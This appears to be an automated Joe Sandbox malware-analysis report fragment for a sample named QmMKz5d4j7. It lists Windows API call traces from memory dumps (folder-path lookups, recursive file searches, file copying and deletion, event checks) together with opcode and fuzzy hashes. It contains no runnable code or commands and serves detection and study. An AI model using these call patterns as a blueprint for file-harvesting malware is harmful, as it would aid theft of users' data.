                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                      • Instruction ID: 51186470935b5ea7dc09d66f4cb3f123c7afd4d01f53faeeaab8c5fbe378d6ae
                                      • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                      • Instruction Fuzzy Hash: 89115EB1A45218EFEB248B94DC49FA9B7B9FB05721F1043AAF51AA32C0D7745940CF51
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s
                                      • String ID:
                                      • API String ID: 3330995566-0
                                      • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                      • Instruction ID: d592912b6ddba72c6b9ed82fcbad3204c0218892bf195751ca6e5ae09ca43e24
                                      • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                      • Instruction Fuzzy Hash: 161125B4E1020AEFCF14CFE6E848BEEB7B5BB44306F40C028E026A6254D7749500CF55
                                      APIs
                                      • CreateFileA.KERNEL32(022E3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,022E3D55,?), ref: 022E9563
                                      • GetFileSizeEx.KERNEL32(000000FF,022E3D55), ref: 022E9580
                                      • CloseHandle.KERNEL32(000000FF), ref: 022E958E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                      • Instruction ID: abc0761735a47766ec3619e024c25d9cef0481d3881f699767b18d813af70466
                                      • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                      • Instruction Fuzzy Hash: 78F04F39E50208BBDF20DFF0DC49B9E77BAEB49710F50C654FA12A7284D67596418B40
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D31
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022E6D4F
                                      • CloseHandle.KERNEL32(00000000), ref: 022E6D60
                                      • Sleep.KERNEL32(00001770), ref: 022E6D6B
                                      • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D81
                                      • ExitProcess.KERNEL32 ref: 022E6D89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                      • Instruction ID: f691de4af503793782dbe8b2146c289a26ed7da5ca3b9e2e3c53031138073a1c
                                      • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                      • Instruction Fuzzy Hash: DDF05E78960306AEEF10ABE1DC09BBD767AEB25751FD01518F503A51D4CBB05100DA66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: `o@
                                      • API String ID: 0-590292170
                                      • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                      • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                      • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                      • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                      APIs
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                      • lstrcatA.KERNEL32(?,006C02C0), ref: 00414C08
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                        • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,006C0F90,?,000003E8), ref: 00414A4A
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                        • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                        • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: UaA
                                      • API String ID: 2104210347-3893042857
                                      • Opcode ID: d4d019fcf4fe3232f543370437d2fd56697a017286707ca818daa4a4179e68a4
                                      • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                      • Opcode Fuzzy Hash: d4d019fcf4fe3232f543370437d2fd56697a017286707ca818daa4a4179e68a4
                                      • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • GetSystemTime.KERNEL32(?,00689760,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SystemTimelstrcpy
                                      • String ID: cI@$cI@
                                      • API String ID: 62757014-1697673767
                                      • Opcode ID: 08129ed12c23d3f194c50dc719ff5aadd717ee4d4a74a7574ffe3a5ba5cd9d49
                                      • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                      • Opcode Fuzzy Hash: 08129ed12c23d3f194c50dc719ff5aadd717ee4d4a74a7574ffe3a5ba5cd9d49
                                      • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                      APIs
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                      • lstrcatA.KERNEL32(?,006C0A88), ref: 004150A8
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                      • String ID: aA
                                      • API String ID: 2699682494-2567749500
                                      • Opcode ID: bf6810f96eb53610a0959d854b70e6bb1317e91cfa13314e8862e500998e2eb1
                                      • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                      • Opcode Fuzzy Hash: bf6810f96eb53610a0959d854b70e6bb1317e91cfa13314e8862e500998e2eb1
                                      • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                        • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                        • Part of subcall function 022DA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                      • lstrlen.KERNEL32(00000000), ref: 022DBF06
                                        • Part of subcall function 022E9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022E90B9
                                      • StrStrA.SHLWAPI(00000000,004213E0), ref: 022DBF34
                                      • lstrlen.KERNEL32(00000000), ref: 022DC00C
                                      • lstrlen.KERNEL32(00000000), ref: 022DC020
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                      • String ID:
                                      • API String ID: 1440504306-0
                                      • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                      • Instruction ID: c1893c81ce1cd6680f137be74c8542ccca9c32687fbe4f244ae07081069c2ad0
                                      • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                      • Instruction Fuzzy Hash: AAB1FB71920318ABCF18EBE4DD95EFE733AAF64304F804159E507A6194EF386A48DF61
                                      APIs
                                      • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                      • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFileNextlstrcat
                                      • String ID: !=A
                                      • API String ID: 3840410801-2919091325
                                      • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                      • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                      • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                      • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                      APIs
                                        • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E51E1
                                      • lstrcat.KERNEL32(?,00421070), ref: 022E51FE
                                      • lstrcat.KERNEL32(?,0064A5F8), ref: 022E5212
                                      • lstrcat.KERNEL32(?,00421074), ref: 022E5224
                                        • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4B93
                                        • Part of subcall function 022E4B77: FindFirstFileA.KERNEL32(?,?), ref: 022E4BAA
                                        • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022E4BD8
                                        • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022E4BEE
                                        • Part of subcall function 022E4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022E4DE4
                                        • Part of subcall function 022E4B77: FindClose.KERNEL32(000000FF), ref: 022E4DF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                      • Instruction ID: 77f1be27e664de97440a867420ffa9e55294e441ca1e3c15efdf699cc591b17a
                                      • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                      • Instruction Fuzzy Hash: 9621DA7AA503087BDB14FBF0DC45EED337EAB55300F804189B68A92194DE7496C9CFA2
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID:
                                      • API String ID: 1206339513-0
                                      • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction ID: fc3a89c7cd4047c8deef02a0682037777e6a97a3e554c36471a3bf2d0a72fd53
                                      • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction Fuzzy Hash: 1301DA79540109FFCB04DFECD998EAE7BBAEF49394F108148F90A9B305C635AA40DB95